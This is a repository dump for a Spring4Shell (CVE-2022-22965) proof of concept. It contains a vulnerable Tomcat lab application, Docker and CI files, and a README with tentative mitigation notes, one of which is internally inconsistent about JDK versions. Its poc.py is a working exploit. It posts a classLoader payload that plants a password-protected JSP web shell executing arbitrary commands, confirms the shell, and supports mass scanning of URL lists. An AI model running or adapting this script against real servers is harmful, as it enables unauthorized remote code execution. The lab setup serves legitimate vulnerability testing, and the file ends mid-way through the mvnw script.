├── .dockerignore ├── .github ├── FUNDING.yml └── workflows │ ├── app-docker-publish.yml │ └── docker-publish.yml ├── Dockerfile ├── README.md ├── poc.py ├── requirements.txt ├── spring4shell.png └── vulnerable-tomcat ├── .dockerignore ├── Dockerfile ├── README.md ├── spring-form.war ├── spring-war ├── .gitignore ├── .mvn │ └── wrapper │ │ └── maven-wrapper.properties ├── build.gradle ├── gradle │ └── wrapper │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── mvnw ├── mvnw.cmd ├── pom.xml ├── settings.gradle └── src │ ├── main │ ├── java │ │ └── com │ │ │ └── example │ │ │ └── handlingformsubmission │ │ │ ├── Greeting.java │ │ │ ├── GreetingController.java │ │ │ └── HandlingFormSubmissionApplication.java │ └── resources │ │ └── templates │ │ ├── greeting.html │ │ └── result.html │ └── test │ └── java │ └── com │ └── example │ └── handlingformsubmission │ └── HandlingFormSubmissionApplicationTest.java └── spring4shellapplication.png /.dockerignore: -------------------------------------------------------------------------------- 1 | vulnerable-tomcat/ 2 | spring4shell.png 3 | README.md 4 | .git/ 5 | .github/ -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: BobTheShoplifter 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX 
Crowdfunding project-name e.g., cloud-foundry 13 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 14 | -------------------------------------------------------------------------------- /.github/workflows/app-docker-publish.yml: -------------------------------------------------------------------------------- 1 | name: Docker-vulnerable-App 2 | 3 | # This workflow uses actions that are not certified by GitHub. 4 | # They are provided by a third-party and are governed by 5 | # separate terms of service, privacy policy, and support 6 | # documentation. 7 | 8 | on: 9 | schedule: 10 | - cron: '16 18 * * *' 11 | push: 12 | branches: [main] 13 | paths: 14 | - 'vulnerable-tomcat/**' 15 | - '!vulnerable-tomcat/README.md' 16 | # Publish semver tags as releases. 17 | tags: ['v*.*.*'] 18 | pull_request: 19 | branches: [main] 20 | 21 | env: 22 | # Use docker.io for Docker Hub if empty 23 | REGISTRY: ghcr.io 24 | # github.repository as / 25 | IMAGE_NAME: ${{ github.REPOSITORY_OWNER }}/spring4shell-vulnerable-tomcat 26 | 27 | jobs: 28 | build: 29 | runs-on: ubuntu-latest 30 | permissions: 31 | contents: read 32 | packages: write 33 | # This is used to complete the identity challenge 34 | # with sigstore/fulcio when running outside of PRs. 
35 | id-token: write 36 | 37 | steps: 38 | - name: Checkout repository 39 | uses: actions/checkout@v3 40 | 41 | # Workaround: https://github.com/docker/build-push-action/issues/461 42 | - name: Setup Docker buildx 43 | uses: docker/setup-buildx-action@79abd3f86f79a9d68a23c75a09a9a85889262adf 44 | 45 | # Login against a Docker registry except on PR 46 | # https://github.com/docker/login-action 47 | - name: Log into registry ${{ env.REGISTRY }} 48 | if: github.event_name != 'pull_request' 49 | uses: docker/login-action@28218f9b04b4f3f62068d7b6ce6ca5b26e35336c 50 | with: 51 | registry: ${{ env.REGISTRY }} 52 | username: ${{ github.actor }} 53 | password: ${{ secrets.GITHUB_TOKEN }} 54 | 55 | # Extract metadata (tags, labels) for Docker 56 | # https://github.com/docker/metadata-action 57 | - name: Extract Docker metadata 58 | id: meta 59 | uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 60 | with: 61 | images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} 62 | 63 | # Build and push Docker image with Buildx (don't push on PR) 64 | # https://github.com/docker/build-push-action 65 | - name: Build and push Docker image 66 | id: build-and-push 67 | uses: docker/build-push-action@ad44023a93711e3deb337508980b4b5e9bcdc5dc 68 | with: 69 | context: vulnerable-tomcat/. 70 | push: ${{ github.event_name != 'pull_request' }} 71 | tags: ${{ steps.meta.outputs.tags }} 72 | labels: ${{ steps.meta.outputs.labels }} 73 | -------------------------------------------------------------------------------- /.github/workflows/docker-publish.yml: -------------------------------------------------------------------------------- 1 | name: Docker 2 | 3 | # This workflow uses actions that are not certified by GitHub. 4 | # They are provided by a third-party and are governed by 5 | # separate terms of service, privacy policy, and support 6 | # documentation. 
7 | 8 | on: 9 | push: 10 | branches: [main] 11 | paths-ignore: 12 | - 'vulnerable-tomcat/**' 13 | - 'README.md' 14 | # Publish semver tags as releases. 15 | tags: ['v*.*.*'] 16 | pull_request: 17 | branches: [main] 18 | 19 | env: 20 | # Use docker.io for Docker Hub if empty 21 | REGISTRY: ghcr.io 22 | # github.repository as / 23 | IMAGE_NAME: ${{ github.repository }} 24 | 25 | jobs: 26 | build: 27 | runs-on: ubuntu-latest 28 | permissions: 29 | contents: read 30 | packages: write 31 | # This is used to complete the identity challenge 32 | # with sigstore/fulcio when running outside of PRs. 33 | id-token: write 34 | 35 | steps: 36 | - name: Checkout repository 37 | uses: actions/checkout@v3 38 | 39 | # Workaround: https://github.com/docker/build-push-action/issues/461 40 | - name: Setup Docker buildx 41 | uses: docker/setup-buildx-action@79abd3f86f79a9d68a23c75a09a9a85889262adf 42 | 43 | # Login against a Docker registry except on PR 44 | # https://github.com/docker/login-action 45 | - name: Log into registry ${{ env.REGISTRY }} 46 | if: github.event_name != 'pull_request' 47 | uses: docker/login-action@28218f9b04b4f3f62068d7b6ce6ca5b26e35336c 48 | with: 49 | registry: ${{ env.REGISTRY }} 50 | username: ${{ github.actor }} 51 | password: ${{ secrets.GITHUB_TOKEN }} 52 | 53 | # Extract metadata (tags, labels) for Docker 54 | # https://github.com/docker/metadata-action 55 | - name: Extract Docker metadata 56 | id: meta 57 | uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 58 | with: 59 | images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} 60 | 61 | # Build and push Docker image with Buildx (don't push on PR) 62 | # https://github.com/docker/build-push-action 63 | - name: Build and push Docker image 64 | id: build-and-push 65 | uses: docker/build-push-action@ad44023a93711e3deb337508980b4b5e9bcdc5dc 66 | with: 67 | context: . 
68 | push: ${{ github.event_name != 'pull_request' }} 69 | tags: ${{ steps.meta.outputs.tags }} 70 | labels: ${{ steps.meta.outputs.labels }} 71 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-alpine 2 | RUN mkdir /app 3 | ADD . /app 4 | WORKDIR /app 5 | RUN pip install -r requirements.txt 6 | ENTRYPOINT ["python", "poc.py"] 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Spring4Shell-POC (CVE-2022-22965) 2 | 3 | ![Spring4Shell](spring4shell.png) 4 | 5 | ![Docker Build](https://github.com/BobTheShoplifter/Spring4Shell-POC/actions/workflows/docker-publish.yml/badge.svg) ![Docker App Build](https://github.com/BobTheShoplifter/Spring4Shell-POC/actions/workflows/app-docker-publish.yml/badge.svg) ![Stars](https://img.shields.io/github/stars/BobTheShoplifter/Spring4Shell-POC?style=social) ![Docker Run](https://img.shields.io/github/followers/BobTheShoplifter?label=Follow&style=social) 6 | 7 | Spring4Shell (CVE-2022-22965) Proof Of Concept/Information + [A vulnerable Tomcat server with a vulnerable spring4shell application.](vulnerable-tomcat/) 8 | 9 | Early this morning, multiple sources reported a possible RCE exploit in the popular Java framework Spring. 10 | 11 | The name of this flaw is based on its similarity to the infamous Log4j flaw, Log4Shell. 
12 | 13 | ## Details about this vulnerability 14 | 15 | - [https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc](https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc) 16 | - [https://www.springcloud.io/post/2022-03/spring-0day-vulnerability](https://www.springcloud.io/post/2022-03/spring-0day-vulnerability) 17 | - [https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement) 18 | 19 | ## POC Usage 20 | 21 | The usage is simple! You can either run the docker image, or just run the python script! 22 | 23 | Please see vulnerable-tomcat for instructions on setting up your own spring4shell vulnerable application [here!](vulnerable-tomcat/) 24 | 25 | ### Requirements 26 | 27 | - Python3 or [Docker](https://hub.docker.com/r/bobtheshoplifter/spring4shell-poc) 28 | 29 | ### Python 30 | 31 | ```python 32 | pip install -r requirements.txt 33 | poc.py --help 34 | ``` 35 | 36 | ![image](https://user-images.githubusercontent.com/22559547/161398549-05d279b2-51d6-49fb-9245-018747606321.png) 37 | 38 | ### Docker 39 | 40 | ```sh 41 | ## Dockerhub 42 | docker pull bobtheshoplifter/spring4shell-poc:latest 43 | docker run bobtheshoplifter/spring4shell-poc:latest --url https://example.io/ 44 | ## Github docker repository 45 | docker pull ghcr.io/bobtheshoplifter/spring4shell-poc:main 46 | docker run ghcr.io/bobtheshoplifter/spring4shell-poc:main --url https://example.io/ 47 | ``` 48 | 49 | ![image](https://user-images.githubusercontent.com/22559547/161400099-fb6c4f02-9d48-457a-8c91-041a9a8438b7.png) 50 | 51 | ## Vulnerable Tomcat server 52 | 53 | I have now made a docker image for this, which includes a vulnerable spring + tomcat application. 54 | 55 | The application should be enough to test this vulnerability. 
56 | 57 | [Please see (vulnerable-tomcat/README.md)](vulnerable-tomcat/README.md) 58 | 59 | ## Mitigations 60 | 61 | !!(The following mitigations are only theoretical as nothing has been confirmed)!! 62 | 63 | ### JDK Version under 9 64 | 65 | Cyberkendra reported that JDK versions lower than JDK 9 may not be affected. 66 | 67 | You can easily check your JDK version by running: 68 | 69 | ```sh 70 | java -version 71 | ``` 72 | 73 | That will display something similar to this: 74 | 75 | ```sh 76 | openjdk version "17.0.2" 2022-01-18 77 | OpenJDK Runtime Environment (build 17.0.2+8-Ubuntu-120.04) 78 | OpenJDK 64-Bit Server VM (build 17.0.2+8-Ubuntu-120.04, mixed mode, sharing) 79 | ``` 80 | 81 | If your JDK version is under 8, you might be safe, but nothing is confirmed yet. 82 | 83 | This article will be updated. 84 | 85 | ### Check if you are using the Spring Framework 86 | 87 | Do a global search for `spring-beans*.jar` and `spring*.jar`: 88 | 89 | ```sh 90 | find . -name 'spring-beans*.jar' 91 | ``` 92 | 93 | [^1]: POC, translated from this repository. 94 | 95 | POC, translated from this repository: https://github.com/craig/SpringCore0day/blob/main/exp.py 96 | -------------------------------------------------------------------------------- /poc.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python3 2 | #coding:utf-8 3 | 4 | import requests 5 | import argparse 6 | import urllib3 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | from urllib.parse import urljoin,urlparse 11 | from threading import Thread 12 | from sys import exit 13 | import time 14 | 15 | 16 | class Exploit(Thread): 17 | 18 | def __init__(self, url): 19 | super(self.__class__, self).__init__() 20 | 21 | self.url = url 22 | 23 | def run(self): 24 | headers = { 25 | "suffix": "%>//", 26 | "c1": "Runtime", 27 | "c2": "<%", 28 | "DNT": "1", 29 | "Content-Type": "application/x-www-form-urlencoded", 30 | } 31 | 32 | data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 33 | 34 | try: 35 | requests.post(self.url, 36 | headers=headers, 37 | data=data, 38 | timeout=15, 39 | allow_redirects=False, 40 | verify=False) 41 | time.sleep(10) ## Wait for the upload to complete 42 | shellurl = urljoin(self.url, 'tomcatwar.jsp') 43 | shellgo = requests.get(shellurl, 44 | timeout=15, 45 | allow_redirects=False, 46 | stream=True, 47 | verify=False) 48 | if shellgo.status_code == 200: 49 | print(f"Vulnerable,shell url: {shellurl}?pwd=j&cmd=whoami") 50 | 51 | ## Depending on the server, the shell url may be in tomcats root folder 52 | else: 53 | parsedurl = 
urlparse(shellurl) 54 | rooturl = parsedurl.scheme+"://"+parsedurl.netloc # There is 100% a better way to do this, please make a PR if you know! 55 | shellurlroot = urljoin(rooturl, 'tomcatwar.jsp') 56 | shellgoroot = requests.get(shellurlroot, 57 | timeout=15, 58 | allow_redirects=False, 59 | stream=True, 60 | verify=False) 61 | if shellgoroot.status_code == 200: 62 | print(f"Vulnerable,shell url: {shellurlroot}?pwd=j&cmd=whoami") 63 | else: 64 | print(f"\033[91m[" + '\u2718' + "]\033[0m", self.url, 65 | "\033[91mNot Vulnerable! :(\033[0m ") 66 | 67 | except Exception as e: 68 | print(e) 69 | pass 70 | 71 | 72 | if __name__ == '__main__': 73 | parser = argparse.ArgumentParser(description='Spring-Core Rce.') 74 | parser.add_argument('--file', help='url file', required=False) 75 | parser.add_argument('--url', help='target url', required=False) 76 | args = parser.parse_args() 77 | 78 | if args.url: 79 | Exploit(args.url).start() 80 | exit() 81 | 82 | if args.file: 83 | with open(args.file) as f: 84 | urls = [i.strip() for i in f.readlines()] 85 | [Exploit(url).start() for url in urls] 86 | 87 | else: 88 | parser.print_help() 89 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | argparse 3 | urllib3 4 | -------------------------------------------------------------------------------- /spring4shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BobTheShoplifter/Spring4Shell-POC/f856cf519af5c75c7cac670dcc1769f282803047/spring4shell.png -------------------------------------------------------------------------------- /vulnerable-tomcat/.dockerignore: -------------------------------------------------------------------------------- 1 | spring-war/ -------------------------------------------------------------------------------- /vulnerable-tomcat/Dockerfile: 
-------------------------------------------------------------------------------- 1 | FROM tomcat:9.0.60-jre11-openjdk-slim-buster 2 | 3 | ADD spring-form.war /usr/local/tomcat/webapps/ 4 | 5 | EXPOSE 8888 6 | 7 | CMD ["catalina.sh", "run"] -------------------------------------------------------------------------------- /vulnerable-tomcat/README.md: -------------------------------------------------------------------------------- 1 | # Example of a spring4shell vulnerable Tomcat application 2 | 3 | ![spring4shellapplication](spring4shellapplication.png) 4 | 5 | ## Example (Docker) 6 | 7 | Prebuilt image available at [Docker Hub](https://hub.docker.com/r/bobtheshoplifter/spring4shell-vulnerable-tomcat) 8 | 9 | An example of a vulnerable Tomcat application + server. 10 | 11 | War files built from /spring-war folder. (It is recommended to build your own war files but I have provided one based on ) 12 | 13 | ### Build 14 | 15 | When building the Docker version of the vulnerable application, you can build your own war files. 16 | 17 | ### Building your own war file 18 | 19 | You can use the provided spring-form.war or build your own. 20 | 21 | #### Prerequisites (Only if building your own war files) 22 | 23 | - Java 24 | - Java JDK (I have only tested with JDK 18) 25 | - [Maven](https://maven.apache.org/install.html) 26 | 27 | ```sh 28 | cd spring-war 29 | mvn clean package 30 | cd target 31 | mv spring-form.war ../../ # Linux move the war file to vulnerable-tomcat 32 | move spring-form.war ../../ # Windows 33 | cd ../../ 34 | ``` 35 | 36 | ### Building and starting the docker container 37 | 38 | ```sh 39 | docker build -t vulnerable-tomcat . 40 | docker run -it --rm -p 8888:8080 vulnerable-tomcat 41 | ``` 42 | 43 | Wait about 20 seconds for the server to start. Then run the exploit script. 
44 | 45 | ```sh 46 | python3 poc.py --url http://:8888/spring-form/greeting 47 | #or docker variant 48 | docker pull ghcr.io/bobtheshoplifter/spring4shell-poc:main 49 | docker run ghcr.io/bobtheshoplifter/spring4shell-poc:main --url http://:8888/spring-form/greeting 50 | ``` 51 | 52 | If all goes well you should see something similar to this! 53 | 54 | ![image](https://user-images.githubusercontent.com/22559547/161576282-a11873df-9b34-454b-9a92-2e15bb9d2a43.png) 55 | 56 | 57 | ## Example (Manual/Old) 58 | 59 | Found an interesting PoC here: [^1]. & 60 | 61 | - Docker, POC 62 | 63 | - clone sample repo from 64 | - you can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial 65 | - modify it so that you can build a war file (). build war file :) 66 | - install tomcat9 + java 11 (I did it on Ubuntu 20.04 via apt-get) 67 | - deploy the war file 68 | - update the PoC () to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT 69 | - run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url 70 | - you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission 71 | - hit to see the results 72 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-form.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BobTheShoplifter/Spring4Shell-POC/f856cf519af5c75c7cac670dcc1769f282803047/vulnerable-tomcat/spring-form.war -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | pom.xml.tag 3 | pom.xml.releaseBackup 4 | pom.xml.versionsBackup 5 | pom.xml.next 6 | release.properties 7 | dependency-reduced-pom.xml 8 | buildNumber.properties 9 | .mvn/timing.properties 10 | # 
https://github.com/takari/maven-wrapper#usage-without-binary-jar 11 | .mvn/wrapper/maven-wrapper.jar 12 | gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/.mvn/wrapper/maven-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.6.3/apache-maven-3.6.3-bin.zip 2 | wrapperUrl=https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.tar.gz 3 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'org.springframework.boot' version '2.6.3' 3 | id 'io.spring.dependency-management' version '1.0.11.RELEASE' 4 | id 'java' 5 | } 6 | 7 | group = 'com.example' 8 | version = '0.0.1-SNAPSHOT' 9 | sourceCompatibility = '1.8' 10 | 11 | repositories { 12 | mavenCentral() 13 | } 14 | 15 | dependencies { 16 | implementation 'org.springframework.boot:spring-boot-starter-thymeleaf' 17 | implementation 'org.springframework.boot:spring-boot-starter-web' 18 | testImplementation 'org.springframework.boot:spring-boot-starter-test' 19 | } 20 | 21 | test { 22 | useJUnitPlatform() 23 | } 24 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-7.1-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/gradlew: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | # 4 | # Copyright 2015 the original author or authors. 5 | # 6 | # Licensed under the Apache License, Version 2.0 (the "License"); 7 | # you may not use this file except in compliance with the License. 8 | # You may obtain a copy of the License at 9 | # 10 | # https://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, software 13 | # distributed under the License is distributed on an "AS IS" BASIS, 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | # See the License for the specific language governing permissions and 16 | # limitations under the License. 17 | # 18 | 19 | ############################################################################## 20 | ## 21 | ## Gradle start up script for UN*X 22 | ## 23 | ############################################################################## 24 | 25 | # Attempt to set APP_HOME 26 | # Resolve links: $0 may be a link 27 | PRG="$0" 28 | # Need this for relative symlinks. 29 | while [ -h "$PRG" ] ; do 30 | ls=`ls -ld "$PRG"` 31 | link=`expr "$ls" : '.*-> \(.*\)$'` 32 | if expr "$link" : '/.*' > /dev/null; then 33 | PRG="$link" 34 | else 35 | PRG=`dirname "$PRG"`"/$link" 36 | fi 37 | done 38 | SAVED="`pwd`" 39 | cd "`dirname \"$PRG\"`/" >/dev/null 40 | APP_HOME="`pwd -P`" 41 | cd "$SAVED" >/dev/null 42 | 43 | APP_NAME="Gradle" 44 | APP_BASE_NAME=`basename "$0"` 45 | 46 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 47 | DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' 48 | 49 | # Use the maximum available, or set MAX_FD != -1 to use that value. 50 | MAX_FD="maximum" 51 | 52 | warn () { 53 | echo "$*" 54 | } 55 | 56 | die () { 57 | echo 58 | echo "$*" 59 | echo 60 | exit 1 61 | } 62 | 63 | # OS specific support (must be 'true' or 'false'). 
64 | cygwin=false 65 | msys=false 66 | darwin=false 67 | nonstop=false 68 | case "`uname`" in 69 | CYGWIN* ) 70 | cygwin=true 71 | ;; 72 | Darwin* ) 73 | darwin=true 74 | ;; 75 | MSYS* | MINGW* ) 76 | msys=true 77 | ;; 78 | NONSTOP* ) 79 | nonstop=true 80 | ;; 81 | esac 82 | 83 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 84 | 85 | 86 | # Determine the Java command to use to start the JVM. 87 | if [ -n "$JAVA_HOME" ] ; then 88 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 89 | # IBM's JDK on AIX uses strange locations for the executables 90 | JAVACMD="$JAVA_HOME/jre/sh/java" 91 | else 92 | JAVACMD="$JAVA_HOME/bin/java" 93 | fi 94 | if [ ! -x "$JAVACMD" ] ; then 95 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 96 | 97 | Please set the JAVA_HOME variable in your environment to match the 98 | location of your Java installation." 99 | fi 100 | else 101 | JAVACMD="java" 102 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 103 | 104 | Please set the JAVA_HOME variable in your environment to match the 105 | location of your Java installation." 106 | fi 107 | 108 | # Increase the maximum file descriptors if we can. 109 | if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then 110 | MAX_FD_LIMIT=`ulimit -H -n` 111 | if [ $? -eq 0 ] ; then 112 | if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then 113 | MAX_FD="$MAX_FD_LIMIT" 114 | fi 115 | ulimit -n $MAX_FD 116 | if [ $? 
-ne 0 ] ; then 117 | warn "Could not set maximum file descriptor limit: $MAX_FD" 118 | fi 119 | else 120 | warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" 121 | fi 122 | fi 123 | 124 | # For Darwin, add options to specify how the application appears in the dock 125 | if $darwin; then 126 | GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" 127 | fi 128 | 129 | # For Cygwin or MSYS, switch paths to Windows format before running java 130 | if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then 131 | APP_HOME=`cygpath --path --mixed "$APP_HOME"` 132 | CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` 133 | 134 | JAVACMD=`cygpath --unix "$JAVACMD"` 135 | 136 | # We build the pattern for arguments to be converted via cygpath 137 | ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` 138 | SEP="" 139 | for dir in $ROOTDIRSRAW ; do 140 | ROOTDIRS="$ROOTDIRS$SEP$dir" 141 | SEP="|" 142 | done 143 | OURCYGPATTERN="(^($ROOTDIRS))" 144 | # Add a user-defined pattern to the cygpath arguments 145 | if [ "$GRADLE_CYGPATTERN" != "" ] ; then 146 | OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" 147 | fi 148 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 149 | i=0 150 | for arg in "$@" ; do 151 | CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` 152 | CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option 153 | 154 | if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition 155 | eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` 156 | else 157 | eval `echo args$i`="\"$arg\"" 158 | fi 159 | i=`expr $i + 1` 160 | done 161 | case $i in 162 | 0) set -- ;; 163 | 1) set -- "$args0" ;; 164 | 2) set -- "$args0" "$args1" ;; 165 | 3) set -- "$args0" "$args1" "$args2" ;; 166 | 4) set -- "$args0" "$args1" "$args2" "$args3" ;; 167 | 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; 168 | 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; 169 | 
7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; 170 | 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; 171 | 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; 172 | esac 173 | fi 174 | 175 | # Escape application args 176 | save () { 177 | for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done 178 | echo " " 179 | } 180 | APP_ARGS=`save "$@"` 181 | 182 | # Collect all arguments for the java command, following the shell quoting and substitution rules 183 | eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" 184 | 185 | exec "$JAVACMD" "$@" 186 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/gradlew.bat: -------------------------------------------------------------------------------- 1 | @rem 2 | @rem Copyright 2015 the original author or authors. 3 | @rem 4 | @rem Licensed under the Apache License, Version 2.0 (the "License"); 5 | @rem you may not use this file except in compliance with the License. 6 | @rem You may obtain a copy of the License at 7 | @rem 8 | @rem https://www.apache.org/licenses/LICENSE-2.0 9 | @rem 10 | @rem Unless required by applicable law or agreed to in writing, software 11 | @rem distributed under the License is distributed on an "AS IS" BASIS, 12 | @rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | @rem See the License for the specific language governing permissions and 14 | @rem limitations under the License. 
15 | @rem 16 | 17 | @if "%DEBUG%" == "" @echo off 18 | @rem ########################################################################## 19 | @rem 20 | @rem Gradle startup script for Windows 21 | @rem 22 | @rem ########################################################################## 23 | 24 | @rem Set local scope for the variables with windows NT shell 25 | if "%OS%"=="Windows_NT" setlocal 26 | 27 | set DIRNAME=%~dp0 28 | if "%DIRNAME%" == "" set DIRNAME=. 29 | set APP_BASE_NAME=%~n0 30 | set APP_HOME=%DIRNAME% 31 | 32 | @rem Resolve any "." and ".." in APP_HOME to make it shorter. 33 | for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi 34 | 35 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 36 | set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" 37 | 38 | @rem Find java.exe 39 | if defined JAVA_HOME goto findJavaFromJavaHome 40 | 41 | set JAVA_EXE=java.exe 42 | %JAVA_EXE% -version >NUL 2>&1 43 | if "%ERRORLEVEL%" == "0" goto execute 44 | 45 | echo. 46 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 47 | echo. 48 | echo Please set the JAVA_HOME variable in your environment to match the 49 | echo location of your Java installation. 50 | 51 | goto fail 52 | 53 | :findJavaFromJavaHome 54 | set JAVA_HOME=%JAVA_HOME:"=% 55 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 56 | 57 | if exist "%JAVA_EXE%" goto execute 58 | 59 | echo. 60 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 61 | echo. 62 | echo Please set the JAVA_HOME variable in your environment to match the 63 | echo location of your Java installation. 
64 | 65 | goto fail 66 | 67 | :execute 68 | @rem Setup the command line 69 | 70 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 71 | 72 | 73 | @rem Execute Gradle 74 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* 75 | 76 | :end 77 | @rem End local scope for the variables with windows NT shell 78 | if "%ERRORLEVEL%"=="0" goto mainEnd 79 | 80 | :fail 81 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 82 | rem the _cmd.exe /c_ return code! 83 | if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 84 | exit /b 1 85 | 86 | :mainEnd 87 | if "%OS%"=="Windows_NT" endlocal 88 | 89 | :omega 90 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/mvnw: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # ---------------------------------------------------------------------------- 3 | # Licensed to the Apache Software Foundation (ASF) under one 4 | # or more contributor license agreements. See the NOTICE file 5 | # distributed with this work for additional information 6 | # regarding copyright ownership. The ASF licenses this file 7 | # to you under the Apache License, Version 2.0 (the 8 | # "License"); you may not use this file except in compliance 9 | # with the License. You may obtain a copy of the License at 10 | # 11 | # 